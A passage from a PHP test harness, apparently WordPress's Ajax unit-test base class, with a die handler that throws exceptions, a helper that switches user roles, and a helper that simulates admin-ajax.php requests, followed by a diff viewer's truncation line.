* Save the output for analysis, stop execution by throwing an exception.
* Error conditions (no output, just die) will throw <code>WPAjaxDieStopException( $message )</code>
* You can test for this with:
* <code>
* $this->setExpectedException( 'WPAjaxDieStopException', 'something contained in $message' );
* </code>
* Normal program termination (wp_die called at then end of output) will throw <code>WPAjaxDieContinueException( $message )</code>
* You can test for this with:
* <code>
* $this->setExpectedException( 'WPAjaxDieContinueException', 'something contained in $message' );
* </code>
* @param string $message
*/
public function dieHandler( $message ) {
$this->_last_response .= ob_get_clean();
ob_end_clean();
if ( '' === $this->_last_response ) {
if ( is_scalar( $message) ) {
throw new WPAjaxDieStopException( (string) $message );
} else {
throw new WPAjaxDieStopException( '0' );
}
} else {
throw new WPAjaxDieContinueException( $message );
}
}
/**
* Switch between user roles
* E.g. administrator, editor, author, contributor, subscriber
* @param string $role
*/
protected function _setRole( $role ) {
$post = $_POST;
$user_id = $this->factory->user->create( array( 'role' => $role ) );
wp_set_current_user( $user_id );
$_POST = array_merge($_POST, $post);
}
/**
* Mimic the ajax handling of admin-ajax.php
* Capture the output via output buffering, and if there is any, store
* it in $this->_last_message.
* @param string $action
*/
protected function _handleAjax($action) {
// Start output buffering
ini_set( 'implicit_flush', false );
ob_start();
// Build the request
$_POST['action'] = $action;
$_GET['action'] = $action;
$_REQUEST = array_merge( $_POST, $_GET );
// Call the hooks
do_action( 'admin_init' );
do_action( 'wp_ajax_' . $_REQUEST['action'], null );
// Save the output
$buffer = ob_get_clean();
if ( !empty( $buffer ) )
$this->_last_response = $buffer;
}
}

Some files were not shown because too many files have changed in this diff Show More